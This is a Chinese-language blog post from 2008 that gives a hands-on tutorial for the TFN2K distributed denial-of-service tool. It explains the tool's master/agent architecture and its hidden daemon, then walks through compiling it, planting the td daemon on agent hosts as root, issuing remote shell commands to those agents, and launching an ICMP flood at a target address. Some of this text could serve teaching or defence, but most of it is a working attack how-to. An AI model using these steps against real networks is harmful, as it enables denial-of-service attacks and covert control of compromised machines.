Chinaunix首页 | 论坛 | 博客
  • 博客访问: 482826
  • 博文数量: 127
  • 博客积分: 7010
  • 博客等级: 少将
  • 技术积分: 1972
  • 用 户 组: 普通用户
  • 注册时间: 2006-12-01 12:42
文章分类

全部博文(127)

文章存档

2009年(33)

2008年(94)

我的朋友

分类: LINUX

2008-06-02 10:32:45

一.tfn2k攻击原理

1.tfn2k的攻击体系。

tfn2k应该算是DDOS攻击中的代表作,其所能实现的功能让人瞠目结舌,叹为观止...来看看它的架构。

主控端---运行tfn客户端,来遥控并指定攻击目标,更改攻击方法.

代理端---被植入并运行td进程的牺牲品,接受tfn的指挥,攻击的实施者.需要注意的是,一个攻击者,往往控制多台代理来完成攻击,而且其系统多为unix,linux等.

目标主机---被攻击的主机或网络,曾经被DDOS的有Yahoo、Amazon、CNN、e-bay等.

2.tfn2k特性。

◆ 主控端通过TCP、UDP、ICMP或随机性其中之一(默认.随机)的数据包向代理端主机发送命令,攻击方法包括TCP/SYN、UDP、

ICMP/PING、混合攻击、TARGA3等。

◆ 主控端与代理端的通讯采取单向,即主控端只向代理端发送命令,并且会采取随机的头信息,甚至虚拟的源地址信息,代理端不会逆向向主控端发送任何信息.

◆ 所有命令经过CAST-256算法加命,其关键字即编译程序时的输入的口令.并且这个口令做为唯一认证凭证.

◆ 利用td进程,主控端可以远程执行shell命令.

◆ td进程的名称可以在编译时更改,更便于隐藏.

◆ tfn可以编译运行于win32及系统的.


二.安装tfn2k

1.解压: tar zxvf tfn2k.tgz

2.修改文件

A. src/Makefile 如果你的系统是linux系统,不需要做任何修就可以,如果是win32系统,请将

# Linux / *BSD* / Others

CC = gcc

CFLAGS = -Wall -O3

CLIBS =

这几行注释掉,并将

# Win32 (cygwin)

#CC = gcc

#CFLAGS = -Wall -DWINDOZE -O2

#CLIBS =

这几行的注释去掉.因为我的测试系统为redhat linux 9.0所以并未做任何修改.


b. src/ip.h 这里要做一些修改,否则编译会有错误,发生重复定义。

/*struct in_addr

{

unsigned long int s_addr;

};*/

注意啊~~我可是将它放在"/* */"之间,也就是注释掉了:)


3.编译tfn2k

cd tfn2k/src

make

首先会谈出一个声明,你必须接受,之后会提示输入8-32位,前边提到过,这是唯一的认证凭证,会被分发于td进程中,编译通过后,会产生td及tfn,这就是大名鼎鼎的tfn2k啦~,td是守护进程,用来安装在代理中的,而tfn就是控制端.

4.安装td.

将td上传到两台代理,ag1(192.168.0.2)和ag2(192.168.0.3)


5.然后以root身份去运行td


三.开始使用

回到master

 [root@master root]#touch host.txt 建立代理记录文件

[root@master root]echo "192.168.0.2" > host.txt 将执行过td的ag1加入host.txt。

 [root@master root]echo "192.168.0.3" >> host.txt 添加ag2到host.txt .

 先来测试一下链接。

 [root@master root]./tfn -f host.txt -c 10 -i "mkdir wjpfjy" 与host.txt中的代理通讯,让其执行命令mkdir wjpfjy即建立一个目录


到ag1和ag2看看有没有建立目录名wjpfjy,一般情况下,会存在于td的同一目录,如果不确定,可以用find / -name wjpfjy -print来查找


[root@master root]./tfn -f host.txt -c 6 -i 192.168.0.5 开始ICMP/PING 攻击aim...


当然还有别的攻击方法,你只要用-c X就可以更改攻击方法.
阅读(1368) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~